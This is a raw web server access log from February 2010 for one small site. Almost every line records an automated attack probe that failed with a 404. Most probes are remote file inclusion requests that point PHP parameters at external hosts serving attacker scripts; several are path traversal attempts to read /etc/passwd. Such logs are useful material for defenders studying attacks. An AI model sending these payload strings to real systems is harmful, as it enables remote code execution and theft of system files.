66.103.128.44 - - [06/Feb/2010:06:20:45 -0800] "GET /logs/access_100130.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:20:46 -0800] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:20:47 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:20:47 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:21:42 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:21:42 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:21:42 -0800] "GET /logs/access_100123.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:06:22:27 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:24:37 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:24:37 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:24:37 -0800] "GET /logs/access_100116.log//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
208.80.193.38 - - [06/Feb/2010:06:24:38 -0800] "GET / HTTP/1.0" 200 899 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; SV1; FunWebProducts; .NET CLR 1.1.4322)" "getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:27:57 -0800] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:27:57 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
24.23.78.174 - - [06/Feb/2010:06:27:57 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:30:20 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:30:21 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:30:21 -0800] "GET /logs/access_100116.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:31:01 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:31:01 -0800] "GET /logs/access_091121.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:31:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:31:29 -0800] "GET /logs/access_100116.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:32:29 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:32:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:32:29 -0800] "GET /logs/access_100123.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:35:11 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:35:11 -0800] "GET /logs/access_100130.log//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:35:12 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:35:23 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:36:08 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:36:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:36:08 -0800] "GET /logs/access_100123.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:36:20 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:36:20 -0800] "GET /logs/bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:36:20 -0800] "GET /logs/access.log/bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:36:25 -0800] "GET /logs/access_100130.log/bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:36:46 -0800] "GET /logs/access_091121.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:37:13 -0800] "GET /logs/access_100116.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:37:28 -0800] "GET /logs/access.log%20%20////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:37:28 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:37:28 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:38:00 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:38:00 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:38:00 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:38:00 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:38:00 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:38:00 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.7.108.149 - - [06/Feb/2010:06:38:02 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.7.108.149 - - [06/Feb/2010:06:38:02 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.7.108.149 - - [06/Feb/2010:06:38:02 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:38:02 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:38:02 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:38:02 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:38:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:38:09 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.227.29.27 - - [06/Feb/2010:06:38:09 -0800] "GET /logs/access_100116.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:38:14 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:38:14 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:38:14 -0800] "GET /logs/access_100130.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:06:38:16 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:06:38:16 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:06:38:16 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:06:38:19 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:06:38:32 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:06:38:32 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:06:38:32 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:06:39:13 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:06:39:13 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.98.23.9 - - [06/Feb/2010:06:39:13 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:39:19 -0800] "GET /logs/access_091121.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:40:40 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:40:40 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:40:40 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:40:40 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:40:40 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.227.251.152 - - [06/Feb/2010:06:40:40 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:40:40 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:40:40 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.106.29.8 - - [06/Feb/2010:06:40:40 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:06:41:10 -0800] "GET /logs/access_091121.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:42:06 -0800] "GET /logs/bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:42:06 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:42:06 -0800] "GET /logs/access_100130.log/bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.25.99 - - [06/Feb/2010:06:42:06 -0800] "GET /logs/access.log/bbs/delete_comment.php?board_skin_path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.7.108.149 - - [06/Feb/2010:06:42:43 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.7.108.149 - - [06/Feb/2010:06:42:43 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.7.108.149 - - [06/Feb/2010:06:42:43 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:06:43:08 -0800] "GET ///write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:06:43:08 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.221.130.15 - - [06/Feb/2010:06:43:08 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:06:45:25 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
110.45.146.189 - - [06/Feb/2010:06:45:25 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:06:45:38 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:06:45:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:45:43 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:45:43 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:45:43 -0800] "GET /logs/access_100130.log///bbs/write_update.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:06:45:45 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:46:03 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
180.68.206.252 - - [06/Feb/2010:06:46:09 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:06:50:32 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:06:50:32 -0800] "GET /delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:06:50:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:50:32 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:50:32 -0800] "GET /logs/access_100130.log///bbs/write_update.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:50:32 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:06:50:35 -0800] "GET /delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:06:50:35 -0800] "GET /logs//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.138.32.230 - - [06/Feb/2010:06:50:35 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:50:36 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:06:50:36 -0800] "GET /logs/access_100130.log///bbs/write_update.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
